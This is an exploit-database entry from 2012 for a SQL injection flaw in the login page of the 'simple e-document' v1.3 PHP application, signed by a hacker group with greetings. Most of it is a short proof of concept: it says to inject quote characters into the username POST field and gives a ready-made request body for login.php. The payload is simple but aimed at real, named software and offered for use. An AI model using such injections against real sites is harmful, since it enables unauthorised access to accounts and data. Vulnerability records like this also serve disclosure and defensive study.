simple e-document <= v1.3 SQL injection Vulnerability

2012-03-31T00:00:00
ID 1337DAY-ID-17898
Type zdt
Reporter Elite Trojan
Modified 2012-03-31T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##################################################
# Exploit Title: simple e-document <= v1.3 SQL injection Vulnerability
# Date: 31/03/2012
# Author: Elite Trojan
# Category: webapps
# version: v1.3
# Vendor or Software Link: https://sourceforge.net/projects/simplee-doc/files/
# Google dork: Use ur mind
# Tested on: linux + windows
##################################################
[~]Exploit/p0c :

Its work by setting The POST variable username to Anything'"at :
http://localhost:80/a/simple_e_document_v_1_3/login.php 

Example : username: admin'"
          Password: 123456
Use an HTTP Editor for Inject ur Ev!l3 with a request data like this : username=admin'"&password=test&op=login&Submit=Login

+--------------------------------------------------+
[»]                    #-DzMafia-#
[»] We are : password, eliteTrojan, gel-dz, BackUp
+--------------------------------------------------+
F0llow Us at : www.fb.me/Ma.dz.fia
+---------------------------------------------------+
[»] Greetz to :
[ TrOon,Aghilas,r00t_dz,Hacker-fire,Vaga-hacker,Imed Lakamora ]
[ & -> !Muslims!,Mosta,team152,Inj3ct0r ]
[ And all my Freinds + Algerian Hackers ]
-----------------------------------------------------+
DzMafia © 2012 All rights reserved.



#  0day.today [2018-04-14]  #